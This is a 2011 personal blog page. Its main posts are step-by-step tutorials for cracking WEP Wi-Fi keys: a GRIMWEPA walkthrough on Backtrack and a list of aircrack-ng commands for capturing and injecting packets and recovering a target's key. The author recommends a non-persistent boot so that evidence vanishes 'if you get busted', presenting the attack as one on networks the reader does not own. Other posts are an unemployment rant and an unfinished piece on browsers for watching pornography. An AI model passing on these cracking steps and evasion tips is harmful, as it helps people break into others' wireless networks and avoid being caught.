Wednesday, April 20, 2011

WEP Cracking without clients connected


This can be done with GRIMWEPA using Backtrack (see below for how to get backtrack)


This method of attack will work with clients or without clients. 


Its located at:
radio network analysis > 80211 > cracking > Grimwepa

After you execute the program you should get something like this. Select the wireless you want to put into monitor mode.


Okay now that we have a wireless interface in monitor mode lets begin. Under the black box you will see the word Channel and on the other side All Channels with a box checked in front if it I recommend you keep the box check unless you now what channel you want. Now lets scan for our targets we can do this with the Refresh Targets command I recommend letting it refresh about two times before stopping it. As you can see below we found our target with a WEP encryption perfect.




So now we have acquired our target nest step is testing our wireless interface's injection capability with the Test Injection command. Now after running the Test Injection command look at the bottom of the windows and you will see something like

""Status: [Injection test results: 25/30: 83%]"
This is good enough but I recommend running it a couple more times  to try to get 100%.



NOW ATTACK METHOD

For the Attack Method we are going to be using Fragmentation. 
Fragmentation is a good attack against WEP is because it only requires on data packet to be received from the access point in order to initiate the attack.

Okay so for attack method select fragmentation if you haven't already. Now look at the Injection rate (pps): and you will see a scale from 100 to 1000. What this means is how many ARP packets you want to inject a second. What is recommend is the farther away you are the slower you want it to be and the closer you are the faster. I usually use it from 600 to 800. Oh almost forgot leave the Choose Client unchecked I will explains this later on but for now you don't need it. Now let's start the attack we can do this by clicking on the Start Attack.


Now we wait for it to capture the data packet. To make a specially crafter ARP Packet to inject. Once it done capturing and creates the ARP Packet it will start injecting and it will look something like this.
Status [Re-playing spoofed arp; Auto-Crack at 10,000+ IVS]



And it will open a new windows but it will be minimized so look at you task bar and open it and it will look like this.



Now once it has captured enough IV's it will start cracking the pass on it's own. Status [Cracking WEP..]



Once it has cracked the password it will display at the bottom of the screen you can easily miss it if your where not paying any attention.
Status: [WEP Key: 4DAE1FC1ED | saved: '/pentest/wireles....]



Still going to update this / make it easier to read and understand.

Unemployment...

WTF... How does someone of the same rank make more $ then me and doesn't even have a job!

Unemployment + child support + G.I bill = FTW  

I'm a hater and gonna hate!

At least you finally have your head above water Cass!

Tuesday, April 19, 2011

How to Crack WEP

1st... There are tons of tutorials, tons of you tube.  But most seem to be long, drawn out, and incorrect.  But Here's the short version. I'll add WPA, WEP2 and maybe WPA2 later.

1st have Backtrack 4 R2, and look on their "How to" section to convert a thumb drive into a bootable devices... then obviously change your bios to allow you to boot via USB, or if you want to just make a DVD go for it.

This is great because... lets just say you get busted... its non persistent so.. power off and all is gone.  So without tons of explanation... type this in konsole.


  • airmon-ng  start wlan0
  • airodump-ng mon0
    • From here find your target, @ top shows AP's, bottom shows connected laptops, ps3 ect.(which you do need to be connected)
    • ctrl+c to stop, copy the MAC looking #, which is the (bssid)
  • airodump-ng --bssid (bssid) --channel # (the channel it was on) --ivs w (any file name) mon0
Open up a new konsole.


  • Aireplay-ng -5 -b (bssid) mon0
  • aireplay-ng -1 1 -a (bssid)
  • Aireplay-ng -3 -b (bssid) -h (your mac) *** Only need to do if having an issue
**some times you might need to switch back to the 1st konsole tracking the AP your craking, do a Ctrl+ C, and re-run the command. "airodump-ng --bssid (bssid) --channel # (the channel it was on) --ivs w (any file name) mon0" **

Final death blow...
  • aircrack-ng 

TBC, gotta run

Which Browser is best to watch Porn on

--still in progress--

Today we are going to talk about one of technology's most important products.... Porn.

Yes, we have all watched it, but this isn't about how nasty it is, or anything perverted... this is about how to do it better!

And just for thier defense... Yes pornogroph is an important tributing factor as to how technological advanced we are today.. HD, Hard drive space and the speed of your internet has been pushed more and more and the main reason... pornography.  Oh and for those idiots shouting "Boycott Arizona".. all you will be boycotting is Sky Mall magazine, Pf Chang's, and Internet Porn.

So our competitors are the following:
Internet Explorer
Firefox
Google Chrome

1st... For those who hide their obsession or hobby.. I would always recommend using 2 browsers, 1 for normal stuff and another for your sick obsession.  Last thing you want is to have a date over, look up something and have it start auto populating with nasty keywords and a nasty history.

Internet Explorer
Internext Explorer is obviously the Default, and the 1st thing someone will go for to start surfing the internet so I suggest you don't use it... but in case you do.

What I found:

Google Chrome:

What I found:
While watching Netflix in one tab and surfing on another I found out that Google Chrome wont stream video's on another tab. It will continue running whats been buffered already but it wont continue streaming until you go back to the tab.

Firefox:

What I found:
While surfing your favorite Tube, clicking the middle mouse button opens the link up in another tab but you stay on the current page. So you can open up tons of movies.  However Firefox wont start streaming until you select each Tab.  From there it will continue Streaming.